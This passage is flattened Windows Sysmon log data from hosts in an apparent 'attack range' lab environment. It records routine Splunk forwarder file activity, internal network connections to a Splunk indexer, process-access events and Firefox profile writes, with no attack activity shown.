Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7C5EE1757619B23C7974FAB17806C06,SHA256=7CE5094FFAA124A89504735B370EA8150A207CBAB53F601D9A4730C72CF71595,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299539Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:21.839{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=120E4A726CEB07DC5183890048A5225C,SHA256=23BF179396FF670D08AACD98D779F78DEB759E38801477622456DD829D970158,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299538Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:19.612{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49624-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000299537Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:21.377{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A55-6216-8307-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299536Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:21.377{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299535Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:21.377{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299534Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:21.377{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299533Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:21.377{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299532Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:21.377{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1A55-6216-8307-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299531Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:21.377{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A55-6216-8307-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299530Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:21.378{C8EA50B7-1A55-6216-8307-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000299529Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:21.038{C8EA50B7-1A54-6216-8207-000000003802}8446304C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000223382Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:22.797{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB22EC54A61B991C8C110650A80075E9,SHA256=8F4E4987DE5CEA897A0721719D0E5160E1327831FA360639E1F5AB20ECEBC19E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299543Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:22.844{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C81B0EF79C418C94EF5F48FBAC40BB3,SHA256=FDBDC96761AF10CC3D09846498F7C9622B12C702C08FB5E0C51301B8971C1FE6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299542Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:22.424{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000299541Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:22.424{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299540Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:22.424{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFa12079.TMPMD5=C788ACA089D90F3A1A6EC3105767DB64,SHA256=342A88EE39B2F3B46C5FF775B5CA8B205D1F4E2D15CC4151DC918B0596F20C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223383Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:23.797{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40C604BEC69E43487E258EACF71F8BA3,SHA256=DDD18A1C861B1E50C21B05AAE063E66CC5297F21E80DB8D4DF7695F4622DFBC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299545Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:23.863{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E2A4FE362A7A700D10B19A919A88B50,SHA256=598454497AF11BA65F1671E5070996C8DACFE775D09E29D654D5F02CE2D6EE17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299544Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:23.697{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=02B699C46F4F0CB2B7BAAF712F5D052D,SHA256=F97B4DACF0D45D204EF844C599F7C7B201453476C5A7BA96F1BEF9E35FD24D5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299546Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:24.880{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E11AEEB28EBA7E7005A79738EE2F3E76,SHA256=7036F855319D6601F9BBA4DB4E1EF75B9AF29EF4A3C69F3211B770F4E16EA05A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223384Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:24.798{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=224F24433D55CFAA25F2216A9F364DB7,SHA256=6D7466ABD32A86FF611EBD1225C23284519989F82127744C02C468EBF25194AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299547Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:25.895{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B957EECF1CF9F4BB66CF5461E140EFD,SHA256=392B597397952D91F7E1043F7BC87CBD9517B70DABBAE68DE5CDCCF686263CD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223386Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:25.798{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=489D5559C67CCB76785578FCBDB6A7EC,SHA256=A4192DD86EE56923EF2795E4FE6856C47151FC7BDDC9268BC904A77E493B5D9A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223385Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:23.551{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51784-false10.0.1.12-8000- 23542300x8000000000000000223387Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:26.799{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18976958552B23702F913AEB49B9A153,SHA256=E6EF12CBEFD18F8CC7020FCE1A99B1D8CD519EABCF86D94D518B6EE1D2B0F86C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299548Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:26.896{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2678DB7A785932D6EE307956B3ABDA1,SHA256=45E5DB821FF3F58636ACE65942F925D04BB763C37012EB2A0F650321FF335D5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223388Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:27.799{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49D4A14207D3FEFBB69EA993814D87E3,SHA256=6AAD2B99850ED932AF49E4D85C7C4D9336456B8265B424393C57D349E570DE2C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299550Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:25.618{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49625-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299549Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:27.911{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37803DCC0DD6D221CE654E97EBDFA775,SHA256=06E94250FC75DE5107F9CA5BA151D7D072E5CCFE5C86D2D8E1D9358FE33DE4D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223389Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:28.862{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B91E643AE7FF4540AA965CC11068180,SHA256=3C1A795E6A4EBC2058B6A941649383974963AEFC284AF326B00C67C3B9216E46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299551Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:28.926{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE0E8AD22BF6EDEE0868EB6BE6835EC8,SHA256=62886455FF498C8B5BE802AF3BA4B460C4609607088829D0CC08E19CF76AEA76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299552Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:29.941{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F709DEF22A3C293F442F9F20A1E6916B,SHA256=394BBC33DEB3BADF8EBADA7D4A7F5E05FC5CB72B519B1C3FBE1FA8315516C6AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223390Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:29.863{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05CE4C4D4F93DF91BFD8EE4486540FF4,SHA256=A458C92DD2753D7B4361EFB7CA3F0654A12F15E7B3725BF58D3AD65B9E0270C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299553Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:30.961{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0461817F210031C4B19321DB18CCBA62,SHA256=933CC1A7DFAF2F7D93775A1B9A802112289175CF04CF5D6D5C1FC00839980491,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223392Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:30.941{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=760EE1C09076AFD80B43AD4A32468160,SHA256=B14241F6CF6F0A5E68734C10EAC197251F10F08FD0033AAD63C9894E3D432C60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223391Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:30.519{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=5D724677486F3B18E65A703880D8C16F,SHA256=A44309F9477D8933FE9C991B46F7072FA6DF646AA1663046407EE79B19B91AFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223394Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:31.943{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=177CC3EC222E3B7E5CFF426811AD2511,SHA256=C86FABAD7EEFA1B61312EDEE871BD341B420651AB181FEB6AB714127F22ACABE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299555Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:31.977{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5034E466BD8658157ECAE3B92EC0B130,SHA256=7306D6077AA9106C581F002EB876E1D7A0A47D9816F8BCE10312E01AB725546E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299554Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:31.525{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=77FCEC0233F921AD2E91BFF26DF2390B,SHA256=9E659CBF227A518C78D854A330006420479B3E3BFDA9475BD23ED6893C21D860,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223393Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:29.539{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51785-false10.0.1.12-8000- 